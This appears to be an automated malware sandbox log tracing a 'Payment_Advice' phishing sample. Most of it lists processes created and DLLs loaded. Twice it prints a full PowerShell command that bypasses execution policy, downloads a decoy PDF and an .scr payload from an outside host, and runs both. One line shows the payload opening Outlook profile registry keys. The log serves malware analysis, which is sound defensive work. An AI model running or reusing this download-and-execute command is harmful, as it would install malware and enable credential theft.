            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /S
            Source: C:\Windows\Temp\hadvices.scrProcess created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /SJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\Temp\hadvices.scrProcess created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: mscoree.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: apphelp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: kernel.appcore.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: version.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: uxtheme.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: wldp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: amsi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: userenv.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: profapi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: msasn1.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: gpapi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: cryptsp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: rsaenh.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: cryptbase.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: windows.storage.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: mscoree.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: kernel.appcore.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: version.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: uxtheme.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: windows.storage.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: wldp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: profapi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: cryptsp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: rsaenh.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: cryptbase.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: rasapi32.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: rasman.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: rtutils.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: mswsock.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: winhttp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: iphlpapi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: dhcpcsvc.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: dnsapi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: winnsi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: rasadhlp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: fwpuclnt.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: secur32.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: sspicli.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: schannel.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: mskeyprotect.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ntasn1.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ncrypt.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: ncryptsslp.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: msasn1.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: gpapi.dll
            Source: C:\Windows\Temp\hadvices.scrSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Payment_Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Temp\hadvices.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
